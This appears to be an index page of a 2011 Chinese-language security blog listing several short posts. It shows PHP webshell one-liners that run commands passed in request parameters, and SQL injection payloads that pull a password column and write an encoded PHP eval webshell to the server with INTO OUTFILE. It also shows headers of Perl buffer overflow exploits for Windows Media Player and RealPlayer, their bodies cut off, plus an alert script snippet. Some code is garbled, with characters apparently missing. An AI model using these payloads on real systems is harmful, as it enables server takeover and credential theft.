php shell-1

一.
  1. <?
  2. $_=“”;
  3. $_[+""]=;
  4. $_=“$_”.“”;
  5. $_=($_[+""]|“”).($_[+""]|“”).($_[+""]^“”);
  6. ?>
  7. <?=${‘_’.$_}['_'](${‘_’.$_}['__']);?>
二.
  1. <?=($_=@$_GET[2]).@$_($_GET[1])?>
13 十二 2011 in security Comments [0]

injection -1

  1. uid=-1 UNION SELECT 1,pwd,3,4,5,6,7,8,9,10,11 from test.table
  2. -1 UNION SELECT 1,0x3c3f706870206576616c28245f504f53545b636d645d293f3e,3,4,5,6,7,8,9,10,11 into outfile ‘e:/web/1.php’
13 十二 2011 in security Comments [0]

Windows Media Player v11.0 (.ape) Buffer Overflow

#!/usr/bin/perl

###
# Title : Windows Media Player v11.0 (.ape) Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Overflow in 'wmplayer.exe' Process
# Tested on : Windows XP SP3 Fran.ais
# Target : Windows Media Player v11.0
### Read more >>>
01 四 2011 in security Comments [0]

还原ASCII码的16进制

找了个相当笨的办法还原ASCII码的16进制…..要学的还真不少啊!

<script>window.alert("x2fx3ex00");</script>
01 四 2011 in security Comments [0]

RealPlayer ‘.rmp’文件远程缓冲区溢出漏洞

#!/usr/bin/perl

###
# Title : RealPlayer v11.0 (.rmp) Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Buffer Overflow
# Tested on : Windows XP SP3 Fran.ais
# Target : RealPlayer v11.0  Read more >>>
01 四 2011 in security Comments [0]
« Previous Entries